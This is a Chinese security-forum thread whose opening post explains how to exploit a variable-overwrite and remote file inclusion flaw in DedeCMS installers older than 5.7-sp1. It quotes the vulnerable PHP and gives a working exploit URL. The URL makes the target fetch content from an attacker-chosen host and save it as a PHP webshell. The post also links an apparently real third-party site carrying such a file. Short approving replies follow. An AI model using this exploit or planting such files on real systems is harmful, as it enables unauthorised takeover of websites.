查看: 84905|回复: 139

如何利用DedeCMS < 5.7-sp1远程文件包含漏洞

[复制链接]
  • TA的每日心情
    郁闷
    2019-12-19 16:52
  • 签到天数: 157 天

    [LV.7]常住居民III

    发表于 2015-7-7 11:10:17 | 显示全部楼层 |阅读模式
    本帖最后由 blackfish 于 2015-7-7 11:21 编辑

    https://www.exploit-db.com/exploits/37423/  我也是昨天才看到
    其实能看懂代码的话这个漏洞非常简单,虽然标题是文件包含,实际上是因为变量覆盖引起的
    漏洞文件在install/index.php.bak
    17 $install_demo_name = 'dedev57demo.txt';
    18 $insLockfile = dirname(__FILE__).'/install_lock.txt';


    29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
    30 {
    31    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
    32 }
    这一段是导致变量覆盖的代码,可以覆盖掉$insLockfile这个变量使file_exists判断失效, 导致利用者可以重新安装网站,这个漏洞很久以前就曝出来了。
    http://www.cnseay.com/2956 这篇文章说的很详细了

    标题中的文件包含在哪里呢

    373 else if($step==11)
    374 {
    375 require_once('../data/admin/config_update.php');
    376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
    377
    378 $sql_content = file_get_contents($rmurl);
    379 $fp = fopen($install_demo_name,'w');
    380 if(fwrite($fp,$sql_content))  //fwrite websehll
    381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
    382 else
    383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
    384 unset($sql_content);
    385 fclose($fp);
    386 exit();
    387 }

    由于变量都是可控的,程序中又用到了 file_get_contents函数去读取远程文件,然后又用fwrite函数保存到本地了。利用方法也非常简单
    [AppleScript] 纯文本查看 复制代码
    http://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://xxxxxx.cn/

    访问如下链接就会把
    [AppleScript] 纯文本查看 复制代码
    http://xxxxxxxx.cn/dedecms/demodata.a.txt
    这个文件的内容保存到
    [AppleScript] 纯文本查看 复制代码
    http://192.168.204.135/install
    目录下一个叫hello.php的文件中


    QQ图片20150707105336.png
    http://paituola.cn/install/hello.php   经过测试网上很多网站都已经删掉install文件夹,所以这个漏洞的影响没那么大。  
    回复

    使用道具 举报

  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-7-7 11:37:52 | 显示全部楼层
    不错的科普文
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-9 09:10
  • 签到天数: 20 天

    [LV.4]偶尔看看III

    发表于 2015-7-7 11:59:16 | 显示全部楼层
    感觉这个漏洞就是一个大大的鸡肋啊!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-7 14:25:29 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-7 23:23:37 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2015-7-8 10:41:55 | 显示全部楼层
    这个不错的介绍说明的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-9-13 12:01
  • 签到天数: 364 天

    [LV.8]以坛为家I

    发表于 2015-7-9 10:13:30 | 显示全部楼层
    我还是学习去吧~~~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-9 16:11:38 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-11 20:59:04 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-12 05:09:43 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-23 07:57 , Processed in 0.026759 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部